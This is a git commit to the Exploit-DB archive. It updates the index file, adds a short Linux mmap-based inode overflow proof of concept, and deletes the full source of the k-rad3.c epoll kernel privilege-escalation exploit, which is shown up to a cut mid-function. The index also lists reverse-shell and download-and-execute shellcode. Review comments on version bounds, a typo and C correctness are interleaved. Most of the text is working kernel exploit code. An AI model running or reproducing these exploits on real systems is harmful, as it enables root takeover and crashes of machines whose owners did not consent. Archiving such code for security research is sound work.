From 38038a71288606a7e8d4fbe6916b1b44b49a5c51 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 24 Nov 2016 05:01:19 +0000 Subject: [PATCH] DB: 2016-11-24 6 new exploits Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow UCanCode - Multiple Vulnerabilities Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1) Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2) Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1) Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2) Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service (PoC) Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (1) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (2) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation (3) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) (1) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Privilege Escalation Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Privilege Escalation (2) Linux Kernel 2.6.18 - 'move_pages()' Information Leak Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak Linux Kenrel 2.6.10 < 
2.6.31.5 - 'pipe.c' Privilege Escalation Windows x64 - Download & Execute Shellcode (358 bytes) --- files.csv | 27 +- platforms/linux/dos/40819.c | 41 ++ platforms/linux/local/141.c | 3 +- platforms/linux/local/142.c | 3 +- platforms/linux/local/25203.c | 740 ------------------------- platforms/linux/local/40810.c | 323 +++++++++++ platforms/linux/local/40811.c | 132 +++++ platforms/linux/local/40812.c | 468 ++++++++++++++++ platforms/linux/local/744.c | 4 + platforms/linux/local/778.c | 4 + platforms/win_x86-64/shellcode/40821.c | 332 +++++++++++ platforms/windows/dos/40820.txt | 329 +++++++++++ 12 files changed, 1653 insertions(+), 753 deletions(-) create mode 100755 platforms/linux/dos/40819.c delete mode 100755 platforms/linux/local/25203.c create mode 100755 platforms/linux/local/40810.c create mode 100755 platforms/linux/local/40811.c create mode 100755 platforms/linux/local/40812.c create mode 100755 platforms/win_x86-64/shellcode/40821.c create mode 100755 platforms/windows/dos/40820.txt diff --git a/files.csv b/files.csv index 347ea6664..52428e9c9 100755 --- a/files.csv +++ b/files.csv 
@@ -3323,6 +3323,8 @@ id,file,description,date,author,platform,type,port 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0 25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow",2005-02-26,Expanders,multiple,dos,0 25171,platforms/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service",2005-02-28,"Luigi Auriemma",multiple,dos,0 +40819,platforms/linux/dos/40819.c,"Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow",2016-11-23,"Todor Donev",linux,dos,0 +40820,platforms/windows/dos/40820.txt,"UCanCode - Multiple Vulnerabilities",2016-11-23,shinnai,windows,dos,0 25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service",2005-03-05,ports,windows,dos,0 25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos,0 25231,platforms/windows/dos/25231.txt,"Microsoft Windows 2000/2003/XP - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos,0 
@@ -4015,8 +4017,8 @@ id,file,description,date,author,platform,type,port 31957,platforms/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",multiple,dos,0 31958,platforms/multiple/dos/31958.txt,"SunAge 1.8.1 - Multiple Denial of Service Vulnerabilities",2008-06-23,"Luigi Auriemma",multiple,dos,0 31964,platforms/windows/dos/31964.txt,"5th street - 'dx8render.dll' Format String",2008-06-25,superkhung,windows,dos,0 -31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0 -31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0 +31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0 +31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32095,platforms/linux/dos/32095.pl,"Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",linux,dos,0 31979,platforms/linux/dos/31979.html,"GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 
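Review bot: The rewritten rows for 31965 and 31966 change the affected range from `2.6.9 <= 2.6.25` to `2.6.9 < 2.6.25`, which narrows the stated upper bound from inclusive to exclusive rather than only normalising the notation; if 2.6.25 itself is affected, the description should keep the inclusive form or state the last affected release explicitly. The same inclusive-to-exclusive rewrite appears in the later hunks for row 1397 (`2.6.9 / 2.6.11 (RHEL4)` to `2.6.9 < 2.6.11 (RHEL 4)`) and row 9191 (`2.6.30 <= 2.6.30.1` to `2.6.30 < 2.6.30.1`). Version bounds in this index are what downstream tooling matches installed kernels against, so an off-by-one release in the bound can turn into a missed match during triage.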
@@ -5254,7 +5256,7 @@ id,file,description,date,author,platform,type,port 40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - PoC (2)",2016-11-01,"p0wd3r / dawu",linux,dos,0 40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - PoC (3)",2016-11-01,"p0wd3r / dawu",linux,dos,0 40699,platforms/windows/dos/40699.txt,"Axessh 4.2 - Denial of Service",2016-11-03,hyp3rlinx,windows,dos,0 -40703,platforms/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service (PoC)",2016-11-08,"Todor Donev",windows,dos,0 +40703,platforms/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service",2016-11-08,"Todor Donev",windows,dos,0 40722,platforms/windows/dos/40722.html,"Microsoft Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0 40731,platforms/linux/dos/40731.c,"Linux Kernel - TCP Related Read Use-After-Free",2016-08-18,"Marco Grassi",linux,dos,0 40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0 
@@ -5304,13 +5306,13 @@ id,file,description,date,author,platform,type,port 131,platforms/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation",2003-12-05,"Wojciech Purczynski",linux,local,0 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Privilege Escalation",2003-12-16,watercloud,hp-ux,local,0 140,platforms/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 -141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0 -142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0 +141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0 +142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0 144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 -145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation (3)",2004-01-15,"Paul Starzetz",linux,local,0 +145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation",2004-01-15,"Paul Starzetz",linux,local,0 152,platforms/linux/local/152.c,"rsync 2.5.7 - Local Stack Overflow Privilege Escalation",2004-02-13,"Abhisek Datta",linux,local,0 -154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) (1)",2004-02-18,"Christophe Devine",linux,local,0 -160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2)",2004-03-01,"Paul Starzetz",linux,local,0 +154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / 
2.4.24 / 2.6.2 - 'mremap()' Validator (PoC)",2004-02-18,"Christophe Devine",linux,local,0 +160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation",2004-03-01,"Paul Starzetz",linux,local,0 172,platforms/windows/local/172.c,"FirstClass Desktop 7.1 - Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 178,platforms/linux/local/178.c,"LBL Traceroute - Privilege Escalation",2000-11-15,"Michel Kaempf",linux,local,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,linux,local,0 @@ -5548,7 +5550,7 @@ id,file,description,date,author,platform,type,port 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0 -1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation",2005-12-30,alert7,linux,local,0 +1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation",2005-12-30,alert7,linux,local,0 1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0 
@@ -6068,7 +6070,7 @@ id,file,description,date,author,platform,type,port 9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Universal Buffer Overflow",2009-07-16,Crazy_Hacker,windows,local,0 9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter - '.m3u' Universal Stack Overflow",2009-07-17,Stack,windows,local,0 9190,platforms/windows/local/9190.pl,"htmldoc 1.8.27.1 - '.html' Universal Stack Overflow",2009-07-17,ksa04,windows,local,0 -9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation",2009-07-17,spender,linux,local,0 +9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Privilege Escalation",2009-07-17,spender,linux,local,0 9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Privilege Escalation",2009-07-20,anonymous,linux,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Privilege Escalation",2009-07-20,anonymous,linux,local,0 
@@ -7865,7 +7867,6 @@ id,file,description,date,author,platform,type,port 25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0 25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow (SEH)",2013-05-02,metacom,windows,local,0 25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0 -25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Privilege Escalation (2)",2005-03-09,alert7,linux,local,0 25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0 25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (2)",2005-04-08,qobaiashi,linux,local,0 
@@ -8653,6 +8654,9 @@ id,file,description,date,author,platform,type,port 40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0 +40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0 +40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0 +40812,platforms/linux/local/40812.c,"Linux Kenrel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 
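Review bot: The added row for 40812 misspells the product name in its description field: `"Linux Kenrel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation"` should read `"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation"`. Searches and filters over this index match on the description text, so the typo would hide the entry from any query for `Linux Kernel`. The commit subject carries the same spelling, so it was presumably copied from the entry rather than introduced by hand.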
@@ -15689,6 +15693,7 @@ id,file,description,date,author,platform,type,port 40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0 40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0 +40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download & Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 diff --git a/platforms/linux/dos/40819.c b/platforms/linux/dos/40819.c new file mode 100755 index 000000000..ee77b04b3 --- /dev/null +++ b/platforms/linux/dos/40819.c 
@@ -0,0 +1,41 @@ +/* Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC + + The inode is a data structure in a Unix-style file system which describes a filesystem + object such as a file or a directory. Each inode stores the attributes and disk block + locations of the object's data. Filesystem object attributes may include metadata, as + well as owner and permission data. + + INODE can be overflowed by mapping a single file too many times, allowing for a local + user to possibly gain root access. + + Disclaimer: + This or previous program is for Educational purpose ONLY. Do not use it without permission. + The usual disclaimer applies, especially the fact that Todor Donev is not liable for any + damages caused by direct or indirect use of the information or functionality provided + by these programs. The author or any Internet provider bears NO responsibility for content + or misuse of these programs or any derivatives thereof. By using these programs you accept + the fac that any damage (dataloss, system crash, system compromise, etc.) caused by the use + of these programs is not Todor Donev's responsibility. + + Thanks to Maya Hristova and all friends. + + Suggestions,comments and job offers are welcome! + + Copyright 2016 (c) Todor Donev + Varna, Bulgaria + todor.donev@gmail.com + https://www.ethical-hacker.org/ + https://www.facebook.com/ethicalhackerorg + http://pastebin.com/u/hackerscommunity + +*/ +#include +#include +#include +void main(){ +int fd, i; +fd = open("/dev/zero", O_RDONLY); +for(i = 0; i < 26999; i++){ +mmap((char*)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0); +} +} \ No newline at end of file diff --git a/platforms/linux/local/141.c b/platforms/linux/local/141.c index a53905455..f50e8268b 100755 --- a/platforms/linux/local/141.c +++ b/platforms/linux/local/141.c 
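Review bot: `void main()` is not a valid entry-point signature for a hosted C program; the definition should be `int main(void)` and end with `return 0;`. The `open("/dev/zero", O_RDONLY)` result on the next line is never checked, so on failure the loop runs with `fd == -1` and every `mmap` fails silently, which makes the PoC appear to run while doing nothing; a guard such as `if (fd < 0) { perror("open"); return 1; }` directly after the `open` call would make that visible, and the `mmap` return value and the descriptor are likewise never checked or closed. The header comment's claim that this "allow[s] a local user to possibly gain root access" is not supported by anything in the listing, which only issues `mmap` calls and is filed under dos, so the comment should be narrowed to what the code demonstrates. The three `#include` lines appear with no header names, which looks like an extraction artifact rather than the committed text, but as shown the file would not compile.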
@@ -1,5 +1,6 @@ /* - * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ + * EDB Note: This will just "test" the vulnerability. +* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ */ /* diff --git a/platforms/linux/local/142.c b/platforms/linux/local/142.c index 6f4d7cfae..bc9e67af1 100755 --- a/platforms/linux/local/142.c +++ b/platforms/linux/local/142.c @@ -1,5 +1,6 @@ /* - * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ + * EDB Note: This will just "test" the vulnerability. +* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ */ /* diff --git a/platforms/linux/local/25203.c b/platforms/linux/local/25203.c deleted file mode 100755 index 8b57f5d0d..000000000 --- a/platforms/linux/local/25203.c +++ /dev/null 
@@ -1,740 +0,0 @@ -/* -source: http://www.securityfocus.com/bid/12763/info - -A Local integer overflow vulnerability affects the Linux kernel. This issue is due to a failure of the affected kernel to properly handle user-supplied size values. - -An attacker may leverage this issue to overwrite low kernel memory. This may potentially facilitate privilege escalation. -*/ - -/* -* k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 -* Discovered and original exploit coded Jan 2005 by sd -* -********************************************************************* -* -* Modified 2005/9 by alert7 -* XFOCUS Security Team http://www.xfocus.org -* -* gcc -o k-rad3 k-rad3.c -static -O2 -* -* tested succeed : -* on default installed RHEL4(2.6.9-5.EL and 2.6.9-5.ELsmp) -* 2.6.9-5.EL ./k-rad3 -p 2 -* 2.6.9-5.ELsmp ./k-rad3 -a -p 7 -* on default installed maglic linux 1.2 -* MagicLinux 2.6.9 #1 ./k-rad3 -t 1 -p 2 -* -* thank watercloud tested maglic linux 1.2 -* thank eist provide RHEL4 to test -* thank sd share his stuff. -* thank xfocus & xfocus's firends -* -* -* TODO: -* CASE 1: use stack > 0xc0000000 -* CASE 2: CONFIG_X86_PAE define ,but cpu flag no pse -* -*[alert7@MagicLinux ~]$ ./k-rad3 -h -*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] -*[ Discovered Jan 2005 by sd ] -*[ Modified 2005/9 by alert7 ] -* -*Usage: ./k-rad3 -* -s forced cpu flag pse -* -a define CONFIG_X86_PAE,default none -* -e have two kernel code,default 0 -* -p alloc pages(4k) ,default 1. Increase from 1 to 7 -* The higher number the more likely it will crash -* -t default 0 -* 0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 -* -*[alert7@MagicLinux ~]$ ./k-rad3 -t 1 -p 2 -*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] -*[ Discovered Jan 2005 by sd ] -*[ Modified 2005/9 by alert7 ] -*[+] try open /proc/cpuinfo .. ok!! 
-*[+] find cpu flag pse in /proc/cpuinfo -*[+] CONFIG_X86_PAE :none -*[+] Cpu flag: pse ok -*[+] Exploit Way : 0 -*[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n) -*[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 -*[+] idtr.base 0xc0461000 ,base 0xc0000000 -*[+] kwrite base 0xc0000000, buf 0xbffed750,num 8196 -*[+] idt[0x7f] addr 0xffc003f8 -*[+] j00 1u(k7 k1d! -*[root@k-rad3 ~] #id -*uid=0(root) gid=0(root) groups=500(alert7) -* -* -* Linux Kernel <= 2.6.11 "sys_epoll_wait" Local integer overflow Exploit -* -* "it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) -* memory due to integer overflow in sys_epoll_wait and misuse of -* __put_user in ep_send_events" -* Georgi Guninski: http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html -* -********************************************************************* -* -* -* In memory of pwned.c (uselib) -* -* - Redistributions of source code is not permitted. -* - Redistributions in the binary form is not permitted. -* - Redistributions of the above copyright notice, this list of conditions, -* and the following disclaimer is permitted. -* - By proceeding to a Redistribution and under any form of the Program -* the Distributor is granting ownership of his Resources without -* limitations to the copyright holder(s). -* -* -* Since we already owned everyone, theres no point keeping this private -* anymore. -* -* http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html -* -* Thanks to our internet hero georgi guninski for being such incredible -* whitehat disclosing one of the most reliable kernel bugs. -* You saved the world, man, we owe you one! -* -* This version is somewhat broken, but skilled reader will get an idea. -* Well, at least let the scriptkids have fun for a while. -* -* Thanks to all who helped me developing/testing this, you know who you are, -* and especially to my gf for guidance while coding this. 
-* -*/ - -#define _GNU_SOURCE - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#ifndef __USE_GNU - #define __USE_GNU -#endif -#include -#include -#include -#include - -/** - * Relationship Variables - * - * 1: CONFIG_X86_PAE - * see /lib/modules/`uname -r`/build/.config - * 1.1: pse - * 2: THREAD_SIZE - * see include/asm/thread_info.h THREAD_SIZE define - */ - - -#define MAP (0xfffff000 - (1023*4096)) -#define MAP_PAE (0xfffff000 - (511*4096)) -#define MKPTE(addr) ((addr & (~4095)) | 0x27) -#define MKPMD(x) (0x1e3|0x004) - -//////////////////////////////////////////////// - -#define KRADPS1 "k-rad3" - -#define kB * 1024 -#define MB * 1024 kB -#define GB * 1024 MB - -#define KRS "\033[1;30m[ \033[1;37m" -#define KRE "\033[1;30m ]\033[0m" -#define KRAD "\033[1;30m[\033[1;37m*\033[1;30m]\033[0m " -#define KRADP "\033[1;30m[\033[1;37m+\033[1;30m]\033[0m " -#define KRADM "\033[1;30m[\033[1;37m-\033[1;30m]\033[0m " - -#define SET_IDT_GATE(idt,ring,s,addr) \ - (idt).off1 = addr & 0xffff; \ - (idt).off2 = addr >> 16; \ - (idt).sel = s; \ - (idt).none = 0; \ - (idt).flags = 0x8E | (ring << 5); - -//config val -static int havepse = 0; -static int definePAE = 0; -static int exploitway = 0; -static int npages = 1; -static int thread_size = 0; - - -static uid_t uid = 0; -static unsigned long long *clear1; -static char * progargv0; - -struct idtr { - unsigned short limit; - unsigned int base; -} __attribute__ ((packed)); - -struct idt { - unsigned short off1; - unsigned short sel; - unsigned char none,flags; - unsigned short off2; -} __attribute__ ((packed)); - - - -#define __syscall_return(type, res) \ -do { \ - if ((unsigned long)(res) >= (unsigned long)(-125)) { \ - errno = -(res); \ - res = -1; \ - } \ - return (type) (res); \ -} while (0) - - -#define _capget_macro(type,name,type1,arg1,type2,arg2) \ - type name(type1 arg1,type2 arg2) \ - { \ - long __res; \ - __asm__ volatile ( "int $0x80" \ - : "=a" (__res) \ - : "0" 
(__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \ - __syscall_return(type,__res); \ - } - -static inline _capget_macro(int,capget,void *,a,void *,b); - -static int THREAD_SIZE_MASK =(-4096); - - -static void -fatal(const char *message) -{ - system("uname -a"); - printf("[-] %s\n",message); - exit(1); -} - -void kernel(unsigned * task) -{ - unsigned * addr = task; - /* looking for uids */ - - *clear1 = 0; - - while (addr[0] != uid || addr[1] != uid || - addr[2] != uid || addr[3] != uid - ) - addr++; - - addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */ - addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */ - -} - -void kcode(void); -void __kcode(void) -{ - asm( - "kcode: \n" - "cld \n" - " pusha \n" - " pushl %es \n" - " pushl %ds \n" - " movl %ss,%edx \n" - " movl %edx,%es \n" - " movl %edx,%ds \n"); - __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); - asm( - " andl %esp,%eax \n" - " pushl (%eax) \n" - " call kernel \n" - " addl $4, %esp \n" - " popl %ds \n" - " popl %es \n" - " popa \n" - " cli \n" - " iret \n" - ); -} - - -void raise_cap(unsigned long *ts) -{ -/* must be on lower addresses because of kernel arg check :) */ -static struct __user_cap_header_struct head; -static struct __user_cap_data_struct data; -static struct __user_cap_data_struct n; - -int i; - -*clear1 = 0; -head.version = 0x19980330; -head.pid = 0; -capget(&head, &data); -/* scan the thread_struct */ -for (i = 0; i < 512; i++, ts++) -{ - /* is it capabilities block? 
*/ - if ( (ts[0] == data.effective) && - (ts[1] == data.inheritable) && - (ts[2] == data.permitted)) - { - /* set effective cap to some val */ - ts[0] = 0x12341234; - capget(&head, &n); - /* and test if it has changed */ - if (n.effective == ts[0]) - { - /* if so, we're in :) */ - ts[0] = ts[1] = ts[2] = 0xffffffff; - return; - } - /* otherwise fix back the stuff - (if we've not crashed already :) */ - ts[0] = data.effective; - } -} -return; -} - - -void stub(void); -void __stub(void) -{ - asm ( - "stub:;" - " pusha;" - ); - __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); - asm( - " and %esp, %eax;" - " pushl (%eax);" - " call raise_cap;" - " pop %eax;" - " popa;" - " iret;" - ); - -} - - -/* write to kernel from buf, num bytes */ -static int -kwrite(unsigned base, char *buf, int num) -{ -#define DIV 256 -#define RES 4 - -int efd, c, i, fd; -int pi[2]; -struct epoll_event ev; -int *stab; -unsigned long ptr; -int count; -unsigned magic = 0xffffffff / 12 + 1; - - printf("[+] kwrite base %p, buf %p,num %d\n", (void *)base,buf,num); - /* initialize epoll */ - efd = epoll_create(4096); - if (efd < 0) - return -1; - - ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP; - - /* 12 bytes per fd + one more to be safely in stack space */ - count = (num+11)/12+RES; - - /* desc array */ - stab = alloca((count+DIV-1)/DIV*sizeof(int)); - - for (i = 0; i < ((count+DIV-1)/DIV)+1; i++) - { - - if (socketpair(AF_UNIX, 